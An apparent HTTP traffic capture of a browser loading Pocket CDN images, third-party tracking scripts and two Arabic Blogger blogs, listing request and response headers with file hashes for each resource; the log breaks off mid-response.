                                             34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                            
server: nginx
content-length: 6376
x-amzn-requestid: 25b82353-9c15-44c0-ada5-55f4697de935
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cR6_KGeaoAMFb_Q=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6383d860-71711cca7c063030292c5e47;Sampled=0
x-amzn-remapped-date: Sun, 27 Nov 2022 21:36:32 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: odmAWkNyUMevvXStu7zRJyckokhyBjUwu7-JSvj8by-JWJ9eAm9P5Q==
via: 1.1 0aebf3fe433ff96e68d785fad4ea4c0e.cloudfront.net (CloudFront), 1.1 64f86ae1c24221f3a2e4d653d6dbc416.cloudfront.net (CloudFront), 1.1 google
date: Sun, 27 Nov 2022 22:01:46 GMT
age: 48473
etag: "53b12a8702f7c5b7cc697e2a24da824d9434be65"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6376
Md5:    78b1389f425425d0450c94d900404dc4
Sha1:   53b12a8702f7c5b7cc697e2a24da824d9434be65
Sha256: 0c1659ab3afc6e45f9e3acb12f8865bb99e4668f7df4501b1cc740e53f5b62ed
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fd56dccc9-321b-431e-8a92-49471e788b4b.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                        
                                             34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                            
server: nginx
content-length: 11165
x-amzn-requestid: 9e35d865-adea-4d2a-b20f-beb014cdd42f
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cR6_JE2VIAMFYgQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6383d860-7cf4db38152cdfa1448cba3d;Sampled=0
x-amzn-remapped-date: Sun, 27 Nov 2022 21:36:32 GMT
x-amz-cf-pop: SFO5-C3, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: 4YRocKXYUOkfho0bEHNX0xMxhhKNH2Cm3XtQDtQK7x2dFOsipPjfCw==
via: 1.1 dec8fa38a453902521b941c7cd70d33c.cloudfront.net (CloudFront), 1.1 d8792dbd3191bbe722eba5b536b979c8.cloudfront.net (CloudFront), 1.1 google
date: Sun, 27 Nov 2022 22:26:45 GMT
age: 46974
etag: "65941dd34eb1063a3f7fe2b6790a11a484a06b9a"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   11165
Md5:    a8935783026c10470f60033d3a860f7b
Sha1:   65941dd34eb1063a3f7fe2b6790a11a484a06b9a
Sha256: e88c706458faf5b5512212692392c7c1a0d8e60af62962267166f5cb60ee9c89
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fd56d2fad-ed89-4d96-831f-7f8467b7079b.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                        
                                             34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                            
server: nginx
content-length: 10119
x-amzn-requestid: 20bfd6a6-2981-42ca-8997-9363676773c1
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cR782HEZIAMFTKQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6383d9eb-552581a92a69d6cd322bf334;Sampled=0
x-amzn-remapped-date: Sun, 27 Nov 2022 21:43:07 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: _jTN1lFL0_PS-9DYgE6O2V6s6AYnlGJs0xCEHn761Mxq_asytlaRoQ==
via: 1.1 e5af640ced3aa8764b82c4bc3f7af38e.cloudfront.net (CloudFront), 1.1 32c16f33c8f5601364fa8229b0d74dc2.cloudfront.net (CloudFront), 1.1 google
date: Sun, 27 Nov 2022 21:51:40 GMT
age: 49079
etag: "9a3ca698ca1aeae695923277ed2244465e01a1ea"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   10119
Md5:    15bd53848c7082464273007e010c54e0
Sha1:   9a3ca698ca1aeae695923277ed2244465e01a1ea
Sha256: 36cfa29965173ea683992d4b436f393e92c978350347f869355d933613e2c005
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F165667de-df17-4cc6-832c-94f49703bdf2.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                        
                                             34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                            
server: nginx
content-length: 9430
x-amzn-requestid: 454ca8bd-a256-45f2-8b41-feee86c5af82
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cR7wyGCIIAMFhgw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6383d99e-1488f8ce71a91ebc3ad6b7e0;Sampled=0
x-amzn-remapped-date: Sun, 27 Nov 2022 21:41:50 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: NMMuQ1NNks65LJK_HDAK69MfCJ3pS0Y6VzBs8_5Oku64v4FSWADCdw==
via: 1.1 8f22423015641505b8c857a37450d6c0.cloudfront.net (CloudFront), 1.1 476c2ba6d9f6cd69dbcedbd65688cbc0.cloudfront.net (CloudFront), 1.1 google
date: Sun, 27 Nov 2022 22:01:46 GMT
age: 48473
etag: "075531f525e625b117b2497f31139c9824d0e9c5"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   9430
Md5:    1f434933b5bd6377d299ada22d1ae7ef
Sha1:   075531f525e625b117b2497f31139c9824d0e9c5
Sha256: b587a3249e4f20112088608e3651c2ccbc44225a5c9d88d3bf5884d7f0e9029c
                                        
                                            GET /i/?l=http%3A%2F%2Falraush.blogspot.com%2F2015%2F05%2Fblog-post-artimes-jarash-temple.html&j= HTTP/1.1 
Host: t.dtscout.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://alraush.blogspot.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                        
                                             172.64.162.7
HTTP/2 200 OK
content-type: application/javascript
                                            
date: Mon, 28 Nov 2022 11:29:39 GMT
x-s: mtl3
set-cookie: m=1; Domain=dtscout.com; Expires=Mon, 28-Nov-2022 12:52:59 GMT; Max-Age=5000; Path=/; SameSite=None; Secure oa=1; Domain=dtscout.com; Expires=Mon, 28-Nov-2022 15:29:39 GMT; Max-Age=14400; Path=/; SameSite=None; Secure df=1669634979; Domain=dtscout.com; Expires=Wed, 08-Mar-2023 11:29:39 GMT; Max-Age=8640000; Path=/; SameSite=None; Secure
x-t: 0.706
expires: Mon, 28 Nov 2022 11:29:38 GMT
cache-control: no-cache
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0fUQC0EUH0uLbkx%2F9oS8vSMH%2BvQ6pV006Wgp82FcS6U77EZfYce1Gz29yhavh3G%2FaQGoxTK5NLwEZXunf1T9xmHk869KpUsfpHTDBAP%2BPE0%2ByxHDyx1iBRSkUUKGk7Xr"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 7712c45a0a1076af-LHR
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (2077)
Size:   1542
Md5:    2f4eb0985dc83f2b37980f9037105fcb
Sha1:   2cca24b5a07dcd53ad36e868eb51556bf2247343
Sha256: e0499b4b1adf6135f3020a8a88133bd1b5d63e8271fcf53f541d2f4aedcd8ee7
                                        
                                            GET /tc.js HTTP/1.1 
Host: cdn.tynt.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://alraush.blogspot.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                        
                                             104.18.36.173
HTTP/2 200 OK
content-type: application/javascript
                                            
date: Mon, 28 Nov 2022 11:29:40 GMT
last-modified: Thu, 21 Jul 2022 14:57:10 GMT
vary: Accept-Encoding
etag: W/"62d96946-4599"
content-encoding: gzip
cf-cache-status: HIT
age: 72251
expires: Thu, 01 Dec 2022 11:29:40 GMT
cache-control: public, max-age=259200
server: cloudflare
cf-ray: 7712c4618f3fb523-OSL
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (647)
Size:   6704
Md5:    1c19de1014ecbb64bf79594584b7e243
Sha1:   e2ab949e99c448f107245a0a39c10e0b30130e9f
Sha256: 5c80cda6336fe83e049aea16c899b4983fa70744beccddd14d75ee0c178c5c77
                                        
                                            GET /b/p?id=w!1jc22x5hkef1&lm=0&ts=1669634979541&dn=TC&iso=0&t=%D8%B5%D9%81%D8%AD%D8%A9%20%D8%AE%D8%B7%D8%A3%20-%20%D8%B3%D9%8A%D8%A7%D8%AD%D8%A9%20%D9%83%D9%88%D9%85&cu=http%3A%2F%2Falraush.blogspot.com%2F%2F2015%2F05%2Fblog-post-artimes-jarash-temple.html HTTP/1.1 
Host: ic.tynt.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://alraush.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                        
                                             67.202.105.33
HTTP/2 204 No Content
                                            
server: nginx/1.16.1
date: Mon, 28 Nov 2022 11:29:40 GMT
cache-control: "no-store, no-cache, must-revalidate, post-check=0, pre-check=0, false"
expires: "Sat, 26 Jul 1997 05:00:00 GMT"
p3p: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
X-Firefox-Spdy: h2

                                        
                                            GET /b/p?id=w!1jc22x5hkef1&lm=0&ts=1669634979541&dn=TC&iso=0&t=%D8%B5%D9%81%D8%AD%D8%A9%20%D8%AE%D8%B7%D8%A3%20-%20%D8%B3%D9%8A%D8%A7%D8%AD%D8%A9%20%D9%83%D9%88%D9%85 HTTP/1.1 
Host: ic.tynt.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://alraush.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                        
                                             67.202.105.33
HTTP/2 204 No Content
                                            
server: nginx/1.16.1
date: Mon, 28 Nov 2022 11:29:40 GMT
cache-control: "no-store, no-cache, must-revalidate, post-check=0, pre-check=0, false"
expires: "Sat, 26 Jul 1997 05:00:00 GMT"
p3p: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
X-Firefox-Spdy: h2

                                        
                                            GET /deb/v2?id=w!1jc22x5hkef1&dn=TC&cc=1&r= HTTP/1.1 
Host: de.tynt.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://alraush.blogspot.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                        
                                             67.202.105.32
HTTP/2 200 OK
content-type: application/javascript
                                            
cache-control: max-age=86400
expires: Tue, 29 Nov 2022 11:29:40 GMT
accept-ch: Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
content-length: 4
date: Mon, 28 Nov 2022 11:29:40 GMT
p3p: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   4
Md5:    350fd6ef6446635f7a8f608434a405ec
Sha1:   a4b6c275ac2c80ec925b5c0c5c6abb79ba897356
Sha256: d21021784cda31eeae5c8295e047a14bda6ed5a9b5963fca9e7ceb398a9c9179
                                        
                                            GET /b/p?id=w!1jc22x5hkef1&lm=0&ts=1669634979541&dn=TC&iso=0 HTTP/1.1 
Host: ic.tynt.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://alraush.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                        
                                             67.202.105.33
HTTP/2 204 No Content
                                            
server: nginx/1.16.1
date: Mon, 28 Nov 2022 11:29:40 GMT
cache-control: "no-store, no-cache, must-revalidate, post-check=0, pre-check=0, false"
expires: "Sat, 26 Jul 1997 05:00:00 GMT"
p3p: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
X-Firefox-Spdy: h2

                                        
                                            GET /b/p?id=w!1jc22x5hkef1&lm=0&ts=1669634979541&dn=TC&iso=0 HTTP/1.1 
Host: ic.tynt.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://alraush.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                        
                                             67.202.105.33
HTTP/2 204 No Content
                                            
server: nginx/1.16.1
date: Mon, 28 Nov 2022 11:29:40 GMT
cache-control: "no-store, no-cache, must-revalidate, post-check=0, pre-check=0, false"
expires: "Sat, 26 Jul 1997 05:00:00 GMT"
p3p: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
X-Firefox-Spdy: h2

                                        
                                            GET /b/p?id=w!1jc22x5hkef1&lm=0&ts=1669634979541&dn=TC&iso=0 HTTP/1.1 
Host: ic.tynt.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://alraush.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                        
                                             67.202.105.33
HTTP/2 204 No Content
                                            
server: nginx/1.16.1
date: Mon, 28 Nov 2022 11:29:41 GMT
cache-control: "no-store, no-cache, must-revalidate, post-check=0, pre-check=0, false"
expires: "Sat, 26 Jul 1997 05:00:00 GMT"
p3p: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
X-Firefox-Spdy: h2

                                        
                                            GET /b/p?id=w!1jc22x5hkef1&lm=0&ts=1669634979541&dn=TC&iso=0 HTTP/1.1 
Host: ic.tynt.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://alraush.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                        
                                             67.202.105.33
HTTP/2 204 No Content
                                            
server: nginx/1.16.1
date: Mon, 28 Nov 2022 11:29:41 GMT
cache-control: "no-store, no-cache, must-revalidate, post-check=0, pre-check=0, false"
expires: "Sat, 26 Jul 1997 05:00:00 GMT"
p3p: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
X-Firefox-Spdy: h2

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Date: Mon, 28 Nov 2022 11:29:41 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Date: Mon, 28 Nov 2022 11:29:41 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /static/v1/widgets/466517130-widget_css_bundle_rtl.css HTTP/1.1 
Host: www.blogger.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                        
                                             142.250.74.105
HTTP/2 200 OK
content-type: text/css
                                            
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="blogger-tech"
report-to: {"group":"blogger-tech","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/blogger-tech"}]}
content-length: 6636
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 23 Nov 2022 02:51:25 GMT
expires: Thu, 23 Nov 2023 02:51:25 GMT
cache-control: public, max-age=31536000
last-modified: Tue, 22 Nov 2022 18:51:51 GMT
age: 463096
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (30626)
Size:   6636
Md5:    ecb9c019ac332da55d49fe85ae0bc883
Sha1:   ed559746be04e88d0558fbdd2defe2d36e1e3ed3
Sha256: a110a100d4816656d09536300391895f3c4735944107188e0959e321e640763e
                                        
                                            GET /ajax/libs/jquery/3.1.0/jquery.min.js HTTP/1.1 
Host: ajax.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                        
                                             142.250.74.106
HTTP/2 200 OK
content-type: text/javascript; charset=UTF-8
                                            
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/hosted-libraries-pushers
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="hosted-libraries-pushers"
report-to: {"group":"hosted-libraries-pushers","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/hosted-libraries-pushers"}]}
timing-allow-origin: *
content-length: 30211
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Tue, 22 Nov 2022 21:33:59 GMT
expires: Wed, 22 Nov 2023 21:33:59 GMT
cache-control: public, max-age=31536000, stale-while-revalidate=2592000
last-modified: Tue, 03 Mar 2020 19:15:00 GMT
age: 482142
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (32014)
Size:   30211
Md5:    28f3d6d8267f129fc0f17d06cf79d668
Sha1:   c115b6f5777693610e4badea0bb3d3093a4d8e0a
Sha256: 6fe4b034f874ace44678689986c0918e5100ba85ba89a59dc2ab237cc20c4214
                                        
                                            GET / HTTP/1.1 
Host: mudwnp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://alraush.blogspot.com/
Upgrade-Insecure-Requests: 1

                                        
                                             142.250.74.161
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                            
Expires: Mon, 28 Nov 2022 11:29:41 GMT
Date: Mon, 28 Nov 2022 11:29:41 GMT
Cache-Control: private, max-age=0
Last-Modified: Wed, 23 Nov 2022 14:26:42 GMT
ETag: W/"3064af2559e14e639779a70f7cd823030598ed62cd09cc289e821ee899d1e1a9"
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 39094
Server: GSE


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (2895)
Size:   39094
Md5:    4299f83306aacc7c68ec54437ad245bc
Sha1:   0bc0d5d54c43d1945939a36380513fe6f7d4c38b
Sha256: 661c1e1e0b0f7e1f373aaf1b53c734f08607da022500d1dbc7a0bc2cecf91489
                                        
                                            GET /-VxPm9nxKGlk/VO0dBWi80HI/AAAAAAAABKs/d42N1EAtPrA/s270/mudwnp.blogspot.com.png HTTP/1.1 
Host: 1.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/

                                        
                                             142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/png
                                            
Access-Control-Expose-Headers: Content-Length
ETag: "v4ac"
Expires: Tue, 29 Nov 2022 11:29:41 GMT
Cache-Control: public, max-age=86400, no-transform
Content-Disposition: inline;filename="mudwnp.blogspot.com.png"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Mon, 28 Nov 2022 11:29:41 GMT
Server: fife
Content-Length: 18015
X-XSS-Protection: 0


--- Additional Info ---
Magic:  PNG image data, 215 x 98, 8-bit/color RGBA, non-interlaced\012- data
Size:   18015
Md5:    465b47b552486c1c941f256f8a0142bf
Sha1:   6ef2cd795dbd54f2919b41f834435eeb3b5ef8a8
Sha256: 457aff29891e8e84f3f574cfac59507ed0653e6b3edcd53bbc9775222b2ad6f9
                                        
                                            GET /-f9WcUdvdRpc/VKIj18tL5jI/AAAAAAAABB4/TSnJE-LetOY/s1600/Template-mudwnp-blogspot.png HTTP/1.1 
Host: 4.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/

                                        
                                             142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/png
                                            
Access-Control-Expose-Headers: Content-Length
ETag: "v41f"
Expires: Tue, 29 Nov 2022 11:29:41 GMT
Cache-Control: public, max-age=86400, no-transform
Content-Disposition: inline;filename="Template-mudwnp-blogspot.png"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Mon, 28 Nov 2022 11:29:41 GMT
Server: fife
Content-Length: 103994
X-XSS-Protection: 0


--- Additional Info ---
Magic:  PNG image data, 940 x 300, 8-bit colormap, non-interlaced\012- data
Size:   103994
Md5:    522e328006bd7ba7597cd620e38b5b13
Sha1:   7871bb9093a05883cebdd06684be2ec70cbe63b2
Sha256: 4b0ed8759b3bcb455f1738ecbad9ed955fb073661588564176adef7eff479346
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Date: Mon, 28 Nov 2022 11:29:41 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /js/cookienotice.js HTTP/1.1 
Host: mudwnp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/

                                        
                                             142.250.74.161
HTTP/1.1 200 OK
Content-Type: text/javascript
                                            
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="blogger-tech"
